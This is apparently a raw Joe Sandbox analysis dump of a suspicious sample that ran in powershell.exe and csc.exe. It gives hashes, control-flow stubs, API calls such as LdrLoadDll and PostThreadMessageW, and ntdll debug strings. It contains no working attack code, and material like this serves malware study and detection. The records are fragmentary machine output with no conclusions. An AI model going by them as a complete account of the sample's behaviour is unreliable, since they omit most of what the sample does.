                                                      • Instruction ID: 4cb891730635ff86ad2f899f576a9c75e83fab7aed293f564357dc68d2daaa8f
                                                      • Opcode Fuzzy Hash: da88a774326f10a492e3d8199edcbd95a9ac470012e81d63375fc4bc411e8847
                                                      • Instruction Fuzzy Hash: 15115E32618F4592EB699F26F480259B7E0FB88B84F984670DA8D47B58EF3CC591CB40

                                                      Execution Graph

                                                      Execution Coverage: 3.7%
                                                      Dynamic/Decrypted Code Coverage: 0%
                                                      Signature Coverage: 0%
                                                      Total number of Nodes: 5
                                                      Total number of Limit Nodes: 1

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.1613146522.00007FF887DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_7ff887db0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: CJ_L
                                                      • API String ID: 0-2543938809
                                                      • Opcode ID: 35ff056a94c4c6fdc8898c360413e116d805163e4fd69e9f5e231f4924a835ca
                                                      • Instruction ID: e619f9839a71757cc25664aaa5ef4b02a9b55e508709258b18fbf388a2c07f36
                                                      • Opcode Fuzzy Hash: 35ff056a94c4c6fdc8898c360413e116d805163e4fd69e9f5e231f4924a835ca
                                                      • Instruction Fuzzy Hash: B4A18031E0CA094FEB58DF58D845BE9BBE1FB59350F1442BED04ED3292DA34A885CB41

                                                      Control-flow Graph

                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.1614016308.00007FF887E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_7ff887e80000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3a7150f4672f33be723a96f940b85b3700477c2256aa282e960f1d913ac42148
                                                      • Instruction ID: c16fa3766802408093f6128203737f862fc99eec8ee27a41651625c1971a21f8
                                                      • Opcode Fuzzy Hash: 3a7150f4672f33be723a96f940b85b3700477c2256aa282e960f1d913ac42148
                                                      • Instruction Fuzzy Hash: FD323422A8DB894FF7A6972898156B87BF1FF56760B4801FBC05DC7193DA2C9C06C351

                                                      Control-flow Graph

                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.1614016308.00007FF887E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_7ff887e80000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 56c2a35dd31331580c00d0e1c7fb9c39cd60047d4d79a8363be00b98a8c84646
                                                      • Instruction ID: 08fc241add23ab6c7b2414a13f140d06fdcfb7a5e4a864ea3572d599c4c5a450
                                                      • Opcode Fuzzy Hash: 56c2a35dd31331580c00d0e1c7fb9c39cd60047d4d79a8363be00b98a8c84646
                                                      • Instruction Fuzzy Hash: C9024831A4CA8D4FF7A59A6898156BD7BF0FF4A760B4401BBD04DCB193DA2CAC06C351

                                                      Control-flow Graph

                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.1614016308.00007FF887E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_7ff887e80000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 17abaa5afab4ae5f8d111e45d86e2f27e07976de270a184ef87c0ff9f14f4cf7
                                                      • Instruction ID: 6f5a5875f48023f627d7a699d40251765c787f726fd79af613d8b12d9235d443
                                                      • Opcode Fuzzy Hash: 17abaa5afab4ae5f8d111e45d86e2f27e07976de270a184ef87c0ff9f14f4cf7
                                                      • Instruction Fuzzy Hash: EFF1367194D7894FE7A69B2898152BC7BF0FF5A660B4901FFC08DC7193DA2C9846C392

                                                      Control-flow Graph

                                                      control_flow_graph: basic-block edge listing for the function starting at 7ff887e82064 (rendered graph not recoverable as text; no API calls referenced in this graph)
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.1614016308.00007FF887E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_7ff887e80000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 805c8f39fcc8ac2ade479614af1eb3cf6338d94a114c3e1d3c650adf00449088
                                                      • Instruction ID: 4e13c1509410d03120e8669f1e629e0f3b5ecbfc5fedb91abd828eeba4a9a419
                                                      • Opcode Fuzzy Hash: 805c8f39fcc8ac2ade479614af1eb3cf6338d94a114c3e1d3c650adf00449088
                                                      • Instruction Fuzzy Hash: 41D1E42194DBC94FF7A6966858642A83FF1EF56661B8901FBC04DCB0D3D91C9C45C352
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.1614016308.00007FF887E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_7ff887e80000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a742df7fdd1d2621263ce4ec6750fc8becaf220e32608d232082301b16c53964
                                                      • Instruction ID: 0db8cac2444759b6fab5665c325cf7b9c42ba09450d6852e1427e5a4da55ff88
                                                      • Opcode Fuzzy Hash: a742df7fdd1d2621263ce4ec6750fc8becaf220e32608d232082301b16c53964
                                                      • Instruction Fuzzy Hash: 8B410D3194CB894FE7A6D628C8596683BF0FF56620B9940FAC05DCB093EA2DEC06C741
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.1614016308.00007FF887E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_7ff887e80000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0ec4725258f4218fba55f8187c793d1a390457b9f3785fe2b6ba2568e0e14d6a
                                                      • Instruction ID: f0f1bcf0325d7eecee0501f99ce5dcf62910fc7612a4b7dcaf47a3a9c4c3d16d
                                                      • Opcode Fuzzy Hash: 0ec4725258f4218fba55f8187c793d1a390457b9f3785fe2b6ba2568e0e14d6a
                                                      • Instruction Fuzzy Hash: BF01A222F4D91A0FFBF5921C24143BC61E6FF88A92B88417AC80EC3186DD1C9C408341
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.1614016308.00007FF887E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_7ff887e80000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d40a4e44c62a4d00f3844f875a065076bbb696e8bce68c0702cc7f51abdcd65a
                                                      • Instruction ID: 56846e78c4958f9fcf64a7b7fe44dac45f37f05876b52cd8077a4d5deb9aa93e
                                                      • Opcode Fuzzy Hash: d40a4e44c62a4d00f3844f875a065076bbb696e8bce68c0702cc7f51abdcd65a
                                                      • Instruction Fuzzy Hash: E6E0D833ECD9591FF7B1A29C38192FC66A0FF5866678402B7D40EC3145DC189C508382

                                                      Execution Graph

                                                      Execution Coverage:1.4%
                                                      Dynamic/Decrypted Code Coverage:5.2%
                                                      Signature Coverage:9%
                                                      Total number of Nodes:134
                                                      Total number of Limit Nodes:8
                                                      execution_graph: node and edge listing omitted (rendered graph not recoverable as text); graph nodes reference LdrInitializeThunk, RtlAllocateHeap, RtlFreeHeap, NtClose, LdrLoadDll, PostThreadMessageW and ExitProcess

                                                      Control-flow Graph

                                                      control_flow_graph 189 4175d3-4175ef 190 4175f7-4175fc 189->190 191 4175f2 call 42dce3 189->191 192 417602-417610 call 42e203 190->192 193 4175fe-417601 190->193 191->190 196 417620-417631 call 42c6b3 192->196 197 417612-41761d call 42e4a3 192->197 202 417633-417647 LdrLoadDll 196->202 203 41764a-41764d 196->203 197->196 202->203
                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417645
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567061985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_400000_csc.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      • Opcode ID: 8e002775716ddafbd47eb7ae43edb81b7bd9865612dd9b2aa705ee0c60120a3d
                                                      • Instruction ID: 197bba766baae9ccb9378d914d43791810f684092e84117df41e3d66ad4e84ee
                                                      • Opcode Fuzzy Hash: 8e002775716ddafbd47eb7ae43edb81b7bd9865612dd9b2aa705ee0c60120a3d
                                                      • Instruction Fuzzy Hash: 77015EB1E0020DABDB10DAA5DC42FDEB378AB14318F0041AAE90897240F634EB448B95

                                                      Control-flow Graph

                                                      control_flow_graph 214 42b113-42b14c call 404e93 call 42c1b3 NtClose
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567061985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_400000_csc.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: ab3c5e634df23d89e276a079ed4ca5b525763aa1515c01312f02267f7250b466
                                                      • Instruction ID: ecdc66760f4493d66e7f9721100b8e1ee1bc8025f612352e310ca33c1c5f3aed
                                                      • Opcode Fuzzy Hash: ab3c5e634df23d89e276a079ed4ca5b525763aa1515c01312f02267f7250b466
                                                      • Instruction Fuzzy Hash: C8E04F312002147BD210AA6ADC42FDB776CEFC5750F40401AFA0CA7282C67479118AF4
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: d3ae9b3497c1a8f009478201d8ef63be719e3d03548322886e40319e9260c038
                                                      • Instruction ID: 4eb08c104f3452b3f2ce1c3c4959ee76fd1f2ce983531638624a45af199248c3
                                                      • Opcode Fuzzy Hash: d3ae9b3497c1a8f009478201d8ef63be719e3d03548322886e40319e9260c038
                                                      • Instruction Fuzzy Hash: 0B90023660550402D904715C45547065015C7D1201FA5C411A1464568D8795CA6166B2

                                                      Control-flow Graph

                                                      control_flow_graph 230 53e2df0-53e2dfc LdrInitializeThunk
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: f59fe0a513b1c5cba6258108aae2539bc8469963dc4dc473e89d038a9d7b99fd
                                                      • Instruction ID: 716ef4cb5645b13e384402531e43b87adf7c822ac07a8dc3feb2baee33e20843
                                                      • Opcode Fuzzy Hash: f59fe0a513b1c5cba6258108aae2539bc8469963dc4dc473e89d038a9d7b99fd
                                                      • Instruction Fuzzy Hash: D590023620140413D915715C45447074019C7D1241FD5C412A1464558D9756CA62A231

                                                      Control-flow Graph

                                                      control_flow_graph 229 53e2c70-53e2c7c LdrInitializeThunk
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: ae7408f40d94551d144952e7a5a9e21706bdf6bcaf420a0dfb4ad528fb8eb62b
                                                      • Instruction ID: 74e44e9c3ccdb3302010d49d6fc31416d8338aa3461540c0cdafccc6801f961e
                                                      • Opcode Fuzzy Hash: ae7408f40d94551d144952e7a5a9e21706bdf6bcaf420a0dfb4ad528fb8eb62b
                                                      • Instruction Fuzzy Hash: F690023620148802D914715C844474A4015C7D1301F99C411A5464658D8795C9A17231

                                                      Control-flow Graph

                                                      control_flow_graph 228 53e2b60-53e2b6c LdrInitializeThunk
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 2ed3cc2c9365a0bcbccaa2db6b051faa7489ab1c98cf1bc4d4576688f198611e
                                                      • Instruction ID: c4cd49c829c7ff6a46887b738bc9f75e4b9d3e68208e083b0b6c5eaf9c9d82ce
                                                      • Opcode Fuzzy Hash: 2ed3cc2c9365a0bcbccaa2db6b051faa7489ab1c98cf1bc4d4576688f198611e
                                                      • Instruction Fuzzy Hash: 69900266202400034909715C4454616801AC7E1201B95C021E2054590DC625C9A16235

                                                      Control-flow Graph

                                                      APIs
                                                      • PostThreadMessageW.USER32(2E85-1J297,00000111,00000000,00000000), ref: 00413CA0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567061985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_400000_csc.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: 2E85-1J297$2E85-1J297
                                                      • API String ID: 1836367815-2292425170
                                                      • Opcode ID: 9ef06354370753566720ce0641794f4365d44dc161e8c80df766a471b4a826e7
                                                      • Instruction ID: fac5187bc1ebd0f532d1b5a8304cfaa8bfc79ea26e974f1851d4e8212ffd96c9
                                                      • Opcode Fuzzy Hash: 9ef06354370753566720ce0641794f4365d44dc161e8c80df766a471b4a826e7
                                                      • Instruction Fuzzy Hash: F8110A71E4421875DB119BA1DC02FDF7B7C9B81750F044256BE14BB2C1E6B8570687E9

                                                      Control-flow Graph

                                                      control_flow_graph 16 413c1d-413c33 17 413c3c-413c91 call 42da93 call 4175d3 call 404e03 call 4243f3 16->17 18 413c37 call 42d083 16->18 27 413cb3-413cb8 17->27 28 413c93-413ca4 PostThreadMessageW 17->28 18->17 28->27 29 413ca6-413cb0 28->29 29->27
                                                      APIs
                                                      • PostThreadMessageW.USER32(2E85-1J297,00000111,00000000,00000000), ref: 00413CA0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567061985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_400000_csc.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: 2E85-1J297$2E85-1J297
                                                      • API String ID: 1836367815-2292425170
                                                      • Opcode ID: b17fdb8d00fd9dbf1a21d31b589a756d2dd2dcbfb6b92dee265ea2bf3424112c
                                                      • Instruction ID: 7d834f13cbc57e5c5536fcf78db2658f70786329c2f6e1f07eabf56f68c91956
                                                      • Opcode Fuzzy Hash: b17fdb8d00fd9dbf1a21d31b589a756d2dd2dcbfb6b92dee265ea2bf3424112c
                                                      • Instruction Fuzzy Hash: AC11A571E4035876EB21AA91DC02FDF7B7C9F81754F04806AFE047B281E6B857068BE9

                                                      Control-flow Graph

                                                      APIs
                                                      • PostThreadMessageW.USER32(2E85-1J297,00000111,00000000,00000000), ref: 00413CA0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567061985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_400000_csc.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: 2E85-1J297$2E85-1J297
                                                      • API String ID: 1836367815-2292425170
                                                      • Opcode ID: 40ac6464cc02b0a17f22d6a0f9b39d8a91636f7c6e9eedb624e9262c98edf3cc
                                                      • Instruction ID: 1a282b7d84d996dac4ab3bb013e31c2a308f112e6a4d465b74d45ac7f165523c
                                                      • Opcode Fuzzy Hash: 40ac6464cc02b0a17f22d6a0f9b39d8a91636f7c6e9eedb624e9262c98edf3cc
                                                      • Instruction Fuzzy Hash: 51018871E4425876DB119B91DC02FDF7B7C9F41754F044066FE047B281E6B8570687E9

                                                      Control-flow Graph

                                                      control_flow_graph 209 42b463-42b4a7 call 404e93 call 42c1b3 RtlFreeHeap
                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,787DA667,00000007,00000000,00000004,00000000,00416EB6,000000F4,?,?,?,?,?), ref: 0042B4A2
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567061985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_400000_csc.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID:
                                                      • API String ID: 3298025750-0
                                                      • Opcode ID: 6046a2a276af6c31bbf028b166cbe6262e2fbb1c8e018c6e84f56d1176c5d109
                                                      • Instruction ID: 29216401f83c999bafc4889d1ef9cf5b8ded11cd2c7a16928c4b59d44ebfb468
                                                      • Opcode Fuzzy Hash: 6046a2a276af6c31bbf028b166cbe6262e2fbb1c8e018c6e84f56d1176c5d109
                                                      • Instruction Fuzzy Hash: BAE039712002047BD614EE59EC45FAB37ACEF89714F004419BA08A7282D670B9208BB5

                                                      Control-flow Graph

                                                      control_flow_graph 204 42b413-42b457 call 404e93 call 42c1b3 RtlAllocateHeap
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(?,0041DDDB,?,?,00000000,?,0041DDDB,?,?,?), ref: 0042B452
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567061985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_400000_csc.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:

                                                      Control-flow Graph

                                                      control_flow_graph 219 42b4b3-42b4ec call 404e93 call 42c1b3 ExitProcess
                                                      APIs
                                                      • ExitProcess.KERNEL32(?,00000000,?,?,80D9C676,?,?,80D9C676), ref: 0042B4E7
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567061985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_400000_csc.jbxd
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID:

                                                      Control-flow Graph

                                                      control_flow_graph 224 53e2c0a-53e2c0f 225 53e2c1f-53e2c26 LdrInitializeThunk 224->225 226 53e2c11-53e2c18 224->226
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                      Strings
                                                      • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0541540A, 05415496, 05415519
                                                      • 8, xrefs: 054152E3
                                                      • Critical section debug info address, xrefs: 0541541F, 0541552E
                                                      • Address of the debug info found in the active list., xrefs: 054154AE, 054154FA
                                                      • corrupted critical section, xrefs: 054154C2
                                                      • Thread identifier, xrefs: 0541553A
                                                      • Invalid debug info address of this critical section, xrefs: 054154B6
                                                      • Critical section address, xrefs: 05415425, 054154BC, 05415534
                                                      • undeleted critical section in freed memory, xrefs: 0541542B
                                                      • Critical section address., xrefs: 05415502
                                                      • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 054154CE
                                                      • Thread is in a state in which it cannot own a critical section, xrefs: 05415543
                                                      • double initialized or corrupted critical section, xrefs: 05415508
                                                      • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 054154E2
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                      Strings
                                                      • @, xrefs: 0539D313
                                                      • @, xrefs: 0539D0FD
                                                      • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0539D146
                                                      • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0539D262
                                                      • Control Panel\Desktop\LanguageConfiguration, xrefs: 0539D196
                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0539D2C3
                                                      • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0539D0CF
                                                      • @, xrefs: 0539D2AF
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                      Strings
                                                      • apphelp.dll, xrefs: 05396496
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 053F9A11, 053F9A3A
                                                      • LdrpInitShimEngine, xrefs: 053F99F4, 053F9A07, 053F9A30
                                                      • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 053F99ED
                                                      • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 053F9A2A
                                                      • Getting the shim engine exports failed with status 0x%08lx, xrefs: 053F9A01
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                      Strings
                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 054121BF
                                                      • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 05412178
                                                      • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0541219F
                                                      • RtlGetAssemblyStorageRoot, xrefs: 05412160, 0541219A, 054121BA
                                                      • SXS: %s() passed the empty activation context, xrefs: 05412165
                                                      • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 05412180
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                      Strings
                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 05418181, 054181F5
                                                      • Loading import redirection DLL: '%wZ', xrefs: 05418170
                                                      • Unable to build import redirection Table, Status = 0x%x, xrefs: 054181E5
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 053DC6C3
                                                      • LdrpInitializeProcess, xrefs: 053DC6C4
                                                      • LdrpInitializeImportRedirection, xrefs: 05418177, 054181EB
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                      Strings
                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 054102E7
